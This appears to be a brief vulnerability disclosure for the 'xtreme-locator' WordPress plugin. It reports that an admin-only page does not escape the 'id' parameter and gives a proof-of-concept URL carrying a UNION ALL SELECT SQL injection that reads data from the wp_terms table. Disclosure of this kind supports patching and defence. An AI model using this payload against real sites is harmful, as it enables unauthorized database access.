Type user access: admins user. $_GET[‘id’] is not escaped. Is accessible for only admins user.
1 - logged with admin user; 2 - send resquest get; http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id;=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wp_terms+WHERE+term_id%3D1